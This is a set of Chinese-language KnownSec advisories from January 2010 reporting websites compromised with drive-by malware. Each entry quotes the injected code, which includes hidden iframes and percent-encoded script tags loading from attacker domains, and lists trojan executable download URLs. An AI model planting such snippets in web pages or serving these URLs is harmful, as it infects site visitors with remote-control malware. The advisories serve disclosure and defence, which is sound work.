知道创宇

发布时间：Sun Jan 10 2010 23:07:16 UTC+0800
最后更新时间：Sun Jan 10 2010 23:07:16 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：南宁信息网
网站链接：http://www.nnxx.com.cn/
恶意代码：
<script src=http://%64%73%66%7A%7A%2E%69%6E%66%6F/z.js></script>
所在页面：http://www.nnxx.com.cn/
下载病毒：
http://my.xingan5.cn:8886/down/my/2011.exe
其他机构判定结果：
google:安全

网站名称：中国行业网站联盟
网站链接：http://union.souyes.com/
恶意代码：
<script src=http://a.ll8cc.cn></script>
所在页面：http://union.souyes.com/
下载病毒：
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/quliao_baidu.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 8% [?]

发布时间：Fri Jan 8 2010 22:11:56 UTC+0800
最后更新时间：Fri Jan 8 2010 22:11:56 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 安全中国（http://www.anqn.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.anqn.com/3389/index.html

网页被嵌入恶意链接代码：
<script>

document.write(”<iframe width=20 height=1 src=yt.htm></iframe>”);

document.write(”<iframe width=20 height=1 src=ytu.htm></iframe>”);

</script>
挂马分析：
[root]http://www.anqn.com/3389/index.html
    [iframe]http://www.anqn.com/3389/yt.htm
        [script]http://www.anqn.com/3389/nop.jpg
        [script]http://www.anqn.com/3389/ml.jpg
        [script]http://www.anqn.com/3389/rl.jpg
            [exe]http://linuxkk.3322.org/test/q.exe
        [script]http://www.anqn.com/3389/kl.jpg
    [iframe]http://www.anqn.com/3389/ytu.htm
        [iframe]http://www.anqn.com/3389/of.htm
            [script]http://www.anqn.com/3389/rl.jpg
            [script]http://www.anqn.com/3389/nop.jpg
            [script]http://www.anqn.com/3389/fq.jpg
    [script]http://js.users.51.la/3463627.js
最终下载病毒文件：
http://linuxkk.3322.org/test/q.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

发布时间：Thu Jan 7 2010 18:15:46 UTC+0800
最后更新时间：Thu Jan 7 2010 18:15:46 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：济宁学院
网站链接：http://www.jnxy.edu.cn/
恶意代码：
  document.write(”<iframe width=’0′ height=’0′ src=’http://www.fec-edu.com/news/images/wm/darkteam.htm’></iframe>”);
所在页面：http://tw.jnxy.edu.cn/
下载病毒：
http://www.fec-edu.com/news/images/wm/cmd.exe
其他机构判定结果：
google:安全

网站名称：千寻网
网站链接：http://qooxoo.com/
恶意代码：
document.writeln (”<script src=\”http://k50mm.332%32.org/google.js\”><\/script>”);
document.writeln (”<script src=\”http://sbsbsb.7766.org/3%32.js\”><\/script>”);
document.writeln (”<script src=\”http://sbsbsb.7766%2Eorg/32.js\”><\/script>”);
所在页面：http://qooxoo.com/js/common.js
下载病毒：
http://cocoexe.8gcc.com:8886/down/my/2004.exe
其他机构判定结果：
google:安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 7% [?]

发布时间：Tue Jan 5 2010 19:47:49 UTC+0800
最后更新时间：Tue Jan 5 2010 19:47:49 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：华讯赛车
网站链接：http://chinasonic.com.cn/
恶意代码：
<iframe src=http://www.nc-ndt.com/gs/system.htm width=0 height=0></iframe>
所在页面：http://chinasonic.com.cn/
下载病毒：
http://www.zzjsxy.com/alsystem.exe
其他机构判定结果：
google:恶意

网站名称：包大人亲子网
网站链接：http://baodaren.com/
恶意代码：
<iframe src=”http://www.qtdyf.cn/swf/muma.html” width=111 height=0 border=0></iframe>
<iframe src=”http://www.qtdyf.cn/swf/muma.html” width=111 height=0 border=0></iframe><script src=http://%73%68%61r%65technology%2Ecn></script><script src=http://%68%6C%6A%64%78%61l.%63n></script><script src=http://liaon%69ng%68%6F%75%73%65.%63n></script><script src=http://%61v%73t%65el.cn></script><script src=http://q%69%71%69%68a%72on%6C%69n%65.c%6E></script><script src=http://e%72%67%6E%6Fl%2Ecn></script><script src=http://%73o%66t%77ares%79%73%74%65%6D%73.c%6E></script><script src=http://t%69an%6Ai%6E%63n%2E%63%6E></script><script src=http://%74l%66%68%6F%75s%65%2E%63%6E></script><script src=http://%361%32%31%30%30%2Ecn></script><script src=http://sto%6Ee%62.%63n></script><script src=http://%73p%6F%72tsin%64ex%2E%63%6E></script><script src=http://e%62o%65%69ng.%63n></script><script src=http://e%62%6F%65i%6Eg%2Ec%6E></script><script src=http://altz%78.%63n></script><script src=http://byn%72ol%2Ec%6E></script><script src=http://b%79%6Er%74%76%2Ecn></script><script src=http://%63%69%74%79%73b%62%73.cn></script><script src=http://%63%6E%6E%65%69%6De%6E%67g%75.c%6E></script><script src=http://%65r%64%73l%79%2Ecn></script><script src=http://i%67g%6Fl%65.cn></script><script src=http://ka%6F%68%73%69%6F%6Eg.%63n></script>
所在页面：http://baodaren.com/
下载病毒：
http://www.qtdyf.cn/swf/host.exe
其他机构判定结果：
google:安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 7% [?]

发布时间：Sat Jan 2 2010 22:00:35 UTC+0800
最后更新时间：Sat Jan 2 2010 22:00:35 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：中国大成智慧教育网
网站链接：http://chinaeducate.com.cn/
恶意代码：
<script language=javascript src=http://ne%62.xo%72g.%70l/c.js?google_ad=11×109_ad></script>
所在页面：http://chinaeducate.com.cn/
下载病毒：
http://xap.ss.la/l/vv.exe
其他机构判定结果：
google:恶意

网站名称：山东同济律师事务所
网站链接：http://www.tongjilawyer.com/
恶意代码：
<script language=javascript src=http://h%64v.x%6Frg.%70l/c.js?google_ad=12×312_ad></script>
所在页面：http://www.tongjilawyer.com/
下载病毒：
http://xap.ss.la/l/vv.exe
其他机构判定结果：
google:安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 7% [?]

发布时间：Fri Jan 1 2010 23:24:45 UTC+0800
最后更新时间：Fri Jan 1 2010 23:24:45 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：中国最大的维修网
网站链接：http://www.weixiuwang.com/
恶意代码：
<script language=javascript src=http://h%67u.x%6Frg.%70l/c.js?google_ad=12×231_ad></script>
所在页面：http://www.weixiuwang.com/
下载病毒：
http://xao.ss.la/l/uu.exe
其他机构判定结果：
google:恶意

网站名称：中华全国工商业联合会金银珠宝业商会网站
网站链接：http://www.ccjp.org.cn/
恶意代码：
<iframe src=http://mm.aa88567.cn/index/mm.htm width=100 height=0></iframe>
所在页面：http://www.ccjp.org.cn/
下载病毒：
http://down.114graph.com/bb/server.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/

推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您是以上网站的管理员，请尽快清除恶意代码，以免更多的用户受到威胁，影响用户的访问感受，损害网站的形象。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 7% [?]